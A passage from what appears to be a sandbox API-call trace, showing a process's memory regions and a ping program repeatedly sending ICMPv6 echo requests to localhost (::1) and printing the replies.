(normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 24940 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 24941 start_va = 0x16d0000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 24966 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 24967 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 24999 start_va = 0x1610000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 25000 start_va = 0x1690000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 25001 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 441 os_tid = 0x5fc [0178.744] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfc84 | out: lpSystemTimeAsFileTime=0xcfc84*(dwLowDateTime=0xa0328880, dwHighDateTime=0x1d440a9)) [0178.744] GetCurrentProcessId () returned 0xca4 [0178.744] GetCurrentThreadId () returned 0x5fc [0178.744] GetTickCount () returned 0x33b1c [0178.744] QueryPerformanceCounter (in: lpPerformanceCount=0xcfc7c | out: lpPerformanceCount=0xcfc7c*=23553295227) returned 1 [0178.744] GetModuleHandleA (lpModuleName=0x0) returned 0x1a0000 [0178.744] __set_app_type (_Type=0x1) [0178.744] __p__fmode () returned 0x76b331f4 [0178.744] __p__commode () returned 0x76b331fc [0178.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1a2ae1) returned 0x0 [0178.745] __getmainargs (in: _Argc=0x1a50d4, _Argv=0x1a50dc, 
_Env=0x1a50d8, _DoWildCard=0, _StartInfo=0x1a50e8 | out: _Argc=0x1a50d4, _Argv=0x1a50dc, _Env=0x1a50d8) returned 0 [0178.745] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.745] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.745] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1a5440 | out: lpWSAData=0x1a5440) returned 0 [0178.751] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xcf714 | out: phkResult=0xcf714*=0x58) returned 0x0 [0178.751] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xcf708, lpData=0xcf710, lpcbData=0xcf70c*=0x4 | out: lpType=0xcf708*=0x0, lpData=0xcf710*=0x0, lpcbData=0xcf70c*=0x4) returned 0x2 [0178.751] RegCloseKey (hKey=0x58) returned 0x0 [0178.751] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf6dc*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf704 | out: ppResult=0xcf704*=0x0) returned 11001 [0178.751] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf6dc*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf704 | out: ppResult=0xcf704*=0x2c37b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2c3878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2c38a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2c2818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0178.953] FreeAddrInfoW (pAddrInfo=0x2c37b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", 
ai_addr=0x2c3878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2c38a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2c2818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0178.953] Icmp6CreateFile () returned 0x2c8bb0 [0179.010] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2c38f0 [0179.010] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x2cec28 [0179.010] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0179.010] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xcf704, nSize=0x0, Arguments=0xcf700 | out: lpBuffer="\x189,") returned 0x19 [0179.011] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x2c3918, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0179.011] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.011] _write (in: _FileHandle=1, _Buf=0x2c3918*, _MaxCharCount=0x19 | out: _Buf=0x2c3918*) returned 25 [0179.011] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.011] LocalFree (hMem=0x2c3918) returned 0x0 [0179.011] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\x189,") returned 0x18 [0179.011] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x2c3918, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0179.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.012] _write (in: _FileHandle=1, _Buf=0x2c3918*, _MaxCharCount=0x18 | out: _Buf=0x2c3918*) 
returned 24 [0179.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.012] LocalFree (hMem=0x2c3918) returned 0x0 [0179.012] SetConsoleCtrlHandler (HandlerRoutine=0x1a17ca, Add=1) returned 1 [0179.012] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0179.014] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0179.014] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0179.014] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0179.014] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.014] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0179.014] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.014] LocalFree (hMem=0x2c51e0) returned 0x0 [0179.014] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0179.014] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0179.014] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.014] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0179.014] _setmode (_FileHandle=1, _Mode=16384) 
returned 32768 [0179.014] LocalFree (hMem=0x2c2a10) returned 0x0 [0179.014] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0179.014] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0179.014] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.014] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0179.015] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.015] LocalFree (hMem=0x2c8f90) returned 0x0 [0179.015] Sleep (dwMilliseconds=0x3e8) [0180.576] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0181.371] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0181.371] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0181.371] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0181.371] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0181.371] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0181.371] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0181.371] LocalFree (hMem=0x2c51e0) returned 0x0 [0181.371] FormatMessageA (in: 
dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0181.372] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0181.372] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0181.372] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0181.372] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0181.372] LocalFree (hMem=0x2c2a10) returned 0x0 [0181.372] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0181.372] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0181.372] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0181.372] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0181.379] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0181.379] LocalFree (hMem=0x2c8f90) returned 0x0 [0181.379] Sleep (dwMilliseconds=0x3e8) [0182.406] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0182.426] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0182.426] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: 
lpBuffer="\xe0\x51\x2c") returned 0x10 [0182.426] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0182.426] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0182.426] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0182.426] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0182.426] LocalFree (hMem=0x2c51e0) returned 0x0 [0182.426] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0182.426] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0182.426] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0182.426] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0182.427] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0182.427] LocalFree (hMem=0x2c2a10) returned 0x0 [0182.427] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0182.427] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0182.427] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0182.427] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0182.427] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0182.428] LocalFree (hMem=0x2c8f90) returned 0x0 [0182.428] Sleep (dwMilliseconds=0x3e8) [0183.529] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 
[0183.605] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0183.605] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0183.605] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0183.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0183.605] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0183.605] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0183.605] LocalFree (hMem=0x2c51e0) returned 0x0 [0183.605] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0183.605] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0183.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0183.605] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0183.605] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0183.605] LocalFree (hMem=0x2c2a10) returned 0x0 [0183.605] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0183.605] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0183.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0183.605] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | 
out: _Buf=0x2c8f90*) returned 2 [0183.606] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0183.606] LocalFree (hMem=0x2c8f90) returned 0x0 [0183.606] Sleep (dwMilliseconds=0x3e8) [0184.706] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0184.843] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0184.843] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0184.843] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0184.843] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0184.843] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0184.843] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0184.843] LocalFree (hMem=0x2c51e0) returned 0x0 [0184.843] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0184.843] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0184.843] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0184.843] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0184.843] _setmode (_FileHandle=1, _Mode=16384) returned 32768 
[0184.843] LocalFree (hMem=0x2c2a10) returned 0x0 [0184.844] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0184.844] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0184.844] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0184.844] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0184.844] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0184.844] LocalFree (hMem=0x2c8f90) returned 0x0 [0184.844] Sleep (dwMilliseconds=0x3e8) [0185.867] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0185.897] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0185.897] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0185.897] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0185.897] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0185.897] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0185.897] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0185.897] LocalFree (hMem=0x2c51e0) returned 0x0 [0185.897] FormatMessageA (in: dwFlags=0x900, 
lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0185.897] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0185.897] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0185.897] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0185.897] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0185.897] LocalFree (hMem=0x2c2a10) returned 0x0 [0185.897] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0185.897] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0185.897] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0185.897] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0185.898] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0185.898] LocalFree (hMem=0x2c8f90) returned 0x0 [0185.898] Sleep (dwMilliseconds=0x3e8) [0186.920] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0186.934] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0186.934] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: 
lpBuffer="\xe0\x51\x2c") returned 0x10 [0186.934] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0186.934] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0186.934] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0186.934] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0186.934] LocalFree (hMem=0x2c51e0) returned 0x0 [0186.934] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0186.934] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0186.935] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0186.935] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0186.935] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0186.935] LocalFree (hMem=0x2c2a10) returned 0x0 [0186.935] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0186.935] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0186.935] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0186.935] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0186.935] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0186.935] LocalFree (hMem=0x2c8f90) returned 0x0 [0186.935] Sleep (dwMilliseconds=0x3e8) [0187.948] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 
